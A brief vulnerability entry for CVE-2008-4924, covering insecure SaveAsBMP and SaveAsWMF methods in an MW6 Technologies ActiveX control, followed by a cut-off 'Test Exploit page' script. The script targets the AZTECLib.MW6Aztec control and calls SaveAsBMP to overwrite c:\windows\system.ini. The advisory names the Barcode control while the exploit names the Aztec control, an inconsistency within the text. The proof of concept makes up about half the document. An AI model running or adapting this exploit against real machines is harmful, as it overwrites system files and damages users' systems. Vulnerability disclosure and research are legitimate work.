CVE-2008-4924

Multiple insecure method vulnerabilities in MW6 Technologies 1D Barcode ActiveX control BARCODELib.MW6Barcode, Barcode.dll 3.0.0.1 allow remote attackers to overwrite arbitrary files via a full pathname argument to the 1 SaveAsBMP and 2 SaveAsWMF methods...

mw6aztec-insecure.txt

Test Exploit page targetFile = "C:\WINDOWS\system32\Aztec.dll" prototype = "Sub SaveAsBMP ByVal FileName As String " memberName = "SaveAsBMP" progid = "AZTECLib.MW6Aztec" argCount = 1 arg1="c:\windows\system.ini" target.SaveAsBMP arg1 'target.SaveAsWMF arg1...